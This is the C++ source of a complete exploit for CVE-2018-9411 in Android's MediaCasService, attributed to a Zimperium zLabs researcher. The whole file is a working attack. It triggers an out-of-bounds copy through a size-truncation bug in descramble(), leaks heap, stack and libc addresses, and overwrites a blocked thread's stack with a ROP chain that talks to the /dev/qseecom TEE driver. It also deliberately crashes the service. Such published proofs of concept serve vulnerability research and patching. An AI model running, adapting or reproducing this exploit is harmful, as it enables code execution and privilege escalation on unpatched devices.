// // CVE-2018-9411 exploit for MediaCasService // Author: Tamir Zahavi-Brunner (@tamir_zb) of Zimperium zLabs Team // #include #include #include #include #include #include #include #include #include #include "qseecom.h" #include "offsets.h" #include "defs.h" using ::android::sp; using ::android::MemoryHeapBase; using ::android::hardware::hidl_vec; using ::android::hardware::hidl_memory; using ::android::hardware::hidl_handle; using ::android::hardware::hidl_string; using ::android::hardware::Return; using ::android::hardware::Void; using namespace android::hardware::cas::V1_0; using namespace android::hardware::cas::native::V1_0; // Global variables relevant for most of the exploit. static sp cas; static sp descrambler; static pthread_barrier_t barrier; // A listener that upon receiving an event, waits on the pthread barrier before // returning. This causes a remote HwBinder thread to be blocked in a known // state (waiting for the onEvent response) until the wait for the barrier is // over. class CasListener : public ICasListener { virtual Return onEvent(int32_t, int32_t, const hidl_vec&) { pthread_barrier_wait(&barrier); return Void(); } }; // Prepare a valid descrambler object to be used in the exploit. // Based on AOSP's MediaCasTest.java static bool prepare_descrambler() { sp service = IMediaCasService::getService(); if (service == NULL) { return false; } static sp listener = new CasListener(); cas = service->createPlugin(CLEARKEY_SYSTEMID, listener); descrambler = IDescrambler::castFrom( service->createDescrambler(CLEARKEY_SYSTEMID)); if (cas->provision(provision_str) != Status::OK) { return false; } Status opensession_status; hidl_vec descrambler_session; cas->openSession([&](Status status, const hidl_vec& session_id) { opensession_status = status; descrambler_session = session_id; }); if (opensession_status != Status::OK) { return false; } if (descrambler->setMediaCasSession(descrambler_session) != Status::OK) { return false; } return true; } // Simply send an event in order to recieve it in CasListener. static void *event_thread(void *) { hidl_vec vec; cas->sendEvent(0, 0, vec); return NULL; } // Prepare remote threads, all blocked in the same known state (waiting for the // onEvent response). static bool prepare_threads() { if (pthread_barrier_init(&barrier, NULL, THREADS_NUM + 1) != 0) { return false; } static pthread_t threads[THREADS_NUM]; for (size_t i = 0; i < THREADS_NUM; i++) { if (pthread_create(threads + i, NULL, event_thread, NULL) != 0) { return false; } } // Wait for all the remote threads to reach the blocked state. usleep(500000); return true; } // Let all the remote blocked threads run. static void unblock_threads() { pthread_barrier_wait(&barrier); pthread_barrier_destroy(&barrier); } // Run the descramble vulnerability in order to perform out of bounds copy. static bool run_descramble_vuln(sp& heap, uint32_t src_offset, uint32_t dst_offset, uint32_t copy_size) { native_handle_t* handle = native_handle_create(1, 0); handle->data[0] = heap->getHeapID(); SharedBuffer src; src.offset = 0; // 0x100000000 would allow access to the entire 32 bit address range. src.size = 0x100000000; // 0x100000000 + heap size will be treated as the size of the shared memory // when performing checks, but when running mmap the number would be // treated as 32 bit and not 64, so the actual size will be just the heap // size. src.heapBase = hidl_memory("ashmem", hidl_handle(handle), 0x100000000 + heap->getSize()); DestinationBuffer dst; dst.type = BufferType::SHARED_MEMORY; dst.nonsecureMemory = src; hidl_vec subsamples; SubSample subsample_arr[] = {{ .numBytesOfClearData = copy_size, .numBytesOfEncryptedData = 0 }}; subsamples.setToExternal(subsample_arr, 1); Status descramble_status; Return descramble_result = descrambler->descramble( ScramblingControl::UNSCRAMBLED, subsamples, src, src_offset, dst, dst_offset, [&] (Status status, uint32_t, const hidl_string&) { descramble_status = status; }); native_handle_delete(handle); return (descramble_result.isOk() && descramble_status == Status::OK); } // Crash the service, which will cause it to restart. The crash is by writing // to a known unmapped address, in order to differentiate this planned crash // from possible other unplanned crashes. static void crash_service(sp& small_heap, uint32_t small_heap_addr) { run_descramble_vuln(small_heap, 0, CRASH_ADDR - small_heap_addr, 1); } // We utilize the fact that the linker leaves data indicating its address in // order to determine the address that the small heap is mapped at. static bool find_small_heap_addr(sp& small_heap, uint32_t *addr) { if (!run_descramble_vuln(small_heap, PAGE_SIZE + LINKER_ADDR_OFFSET, 0, sizeof(*addr))) { return false; } *addr = *(uint32_t *)small_heap->getBase() - LINKER_ADDR_SMALL_HEAP_ADDR_OFFSET; return true; } // Try to have our shared memory mapped directly above threads stacks, then // read data from a stack of a thread blocked on an onEvent call, which will be // our target thread. static bool find_target_thread(sp& large_heap, uint32_t *stack_addr, uint32_t *libc_addr) { // 4 = our own shared memory + 3 stacks in order to find a stack of a // thread which is in the (blocked) state we want it to be. Top stacks // would most likely be the threads currently parsing our request. uint32_t read_offset = STACK_SIZE * 4; read_offset += START_THREAD_OFFSET; uint32_t copy_size = STACK_BASE_OFFSET - START_THREAD_OFFSET + sizeof(*stack_addr); if (!run_descramble_vuln(large_heap, read_offset, 0, copy_size)) { return false; } uint8_t *large_heap_data = (uint8_t *)large_heap->getBase(); // In order to find the address the stack is mapped in we find pthread's // pthread_internal_t struct in the bottom and read its "attr.stack_base". uint32_t stack_map = *(uint32_t *)(large_heap_data + STACK_BASE_OFFSET - START_THREAD_OFFSET); // In order to find libc, we use an address on the stack which is to a // location inside libc's __start_thread. uint32_t start_thread = *(uint32_t *)(large_heap_data); // If our shared memory wasn't mapped directly over the threads stacks then // at least one of these would most likely be 0. if (start_thread == 0 || stack_map == 0) { return false; } // Skip the guard page at the beginning of the stack. *stack_addr = stack_map + PAGE_SIZE; *libc_addr = start_thread - START_THREAD_LIBC_OFFSET; return true; } // Overwrite the target thread's stack with our ROP stack. static bool write_rop(sp& small_heap, uint32_t stack_addr, uint32_t libc_addr, uint32_t small_heap_addr) { // This ROP chain performs the following code: // // int fd = open("/dev/qseecom", 0); // ioctl(fd, QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ, stack_addr); // sleep(0xffffffff); // // This ROP chain demonstrates how the exploit performs communication with // the TEE device driver by getting the QSEOS version. The sleep at the end // allows us to read the result (otherwise the target thread would crash // immediately after running the ROP chain). uint32_t *rop = (uint32_t *)small_heap->getBase(); size_t i = 0; rop[i++] = libc_addr + POP_R0_R1_PC; // pc = pop {r0, r1, pc} rop[i++] = UNUSED_REGISTER; // r0 rop[i++] = libc_addr + POP_R0_R1_PC; // r1 = pop {r0, r1, pc} rop[i++] = libc_addr + BLX_R1_POP_R7_PC; // pc = blx r1; pop {r7, pc} rop[i++] = stack_addr; // r0 = "/dev/qseecom" rop[i++] = 0; // r1 = 0 rop[i++] = libc_addr + OPEN_2_OFFSET; // pc = __open_2 rop[i++] = UNUSED_REGISTER; // r7 rop[i++] = libc_addr + POP_R1_R2_PC; // pc = pop {r1, r2, pc} rop[i++] = libc_addr + POP_R1_R2_PC; // r1 = pop {r1, r2, pc} rop[i++] = UNUSED_REGISTER; // r2 rop[i++] = libc_addr + BLX_R1_POP_R7_PC; // pc = blx r1; pop {r7, pc} rop[i++] = QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ; // r1 rop[i++] = stack_addr; // r2 = stack_addr rop[i++] = libc_addr + IOCTL_OFFSET; // pc = ioctl rop[i++] = UNUSED_REGISTER; // r7 rop[i++] = libc_addr + POP_R0_PC; // pc = pop {r0, pc} rop[i++] = 0xffffffff; // r0 = 0xffffffff rop[i++] = libc_addr + SLEEP_OFFSET; // pc = sleep // The ROP stack begins by overwriting a return address in the blocked // thread. return run_descramble_vuln(small_heap, 0, stack_addr + WAIT_FOR_RESPONSE_RA_OFFSET - small_heap_addr, sizeof(*rop) * i); } int main(int, char **argv) { // We use a small gap that the linker leaves in order to have a // deterministic location for the shared memory to be mapped at. The gap is // so small that usually nothing else gets mapped there. The small heap is // a single page in order to always be mapped in that gap. sp small_heap = new MemoryHeapBase(PAGE_SIZE); // Use a relatively large shared memory (stack size is large enough) in // order to try and be mapped directly above threads stacks. sp large_heap = new MemoryHeapBase(STACK_SIZE); uint32_t small_heap_addr, stack_addr, libc_addr; if (!prepare_descrambler()) { fprintf(stderr, "[-] Failed to prepare the descrambler object\n"); return -1; } printf("[+] Prepared descrambler object\n"); if (!find_small_heap_addr(small_heap, &small_heap_addr)) { fprintf(stderr, "[-] Failed to find small heap address\n"); return -1; } printf("[+] Determined small heap address (address = 0x%08x)\n", small_heap_addr); if (!prepare_threads()) { fprintf(stderr, "[-] Failed to prepare the remote threads\n"); return -1; } printf("[+] Prepared remote threads\n"); if (!find_target_thread(large_heap, &stack_addr, &libc_addr)) { // This is the most unreliable part of the exploit. Other things // (like the jemalloc heap) could easily get mapped between us and // the threads stacks. So in case something like that happens we // crash the service in order for it to restart and then try again. fprintf(stderr, "[-] Failed to find target thread, crashing service " "and retrying...\n\n"); crash_service(small_heap, small_heap_addr); // Dirty restart, better code would reset the resources and try again. execv(argv[0], argv); } printf("[+] Found target thread (stack address = 0x%08x, libc address = " "0x%08x)\n", stack_addr, libc_addr); // The offset to the target thread stack from the small heap. uint32_t stack_addr_offset = stack_addr - small_heap_addr; // Copy data for the ROP chain to the top of the stack (writable location // that won't get overwritten). char dev_qseecom[] = "/dev/qseecom"; strcpy((char *)small_heap->getBase(), dev_qseecom); if (!run_descramble_vuln(small_heap, 0, stack_addr_offset, sizeof(dev_qseecom))) { fprintf(stderr, "[-] Failed to copy data for the ROP chain\n"); return -1; } printf("[+] Copied data for ROP chain\n"); if (!write_rop(small_heap, stack_addr, libc_addr, small_heap_addr)) { fprintf(stderr, "[-] Failed to write ROP stack\n"); return -1; } printf("[+] ROP stack written\n"); printf("[+] Running ROP chain...\n"); unblock_threads(); // Wait for the target thread to run the ROP chain. usleep(500000); // Copy back the result - QSEOS version. if (!run_descramble_vuln(small_heap, stack_addr_offset, 0, sizeof(uint32_t))) { fprintf(stderr, "[-] Failed to copy QSEOS version\n"); return -1; } uint32_t qseos_version = *(uint32_t *)small_heap->getBase(); printf("[+] QSEOS version = 0x%x\n", qseos_version); // Clear everything by crashing the service and letting it restart. crash_service(small_heap, small_heap_addr); return 0; }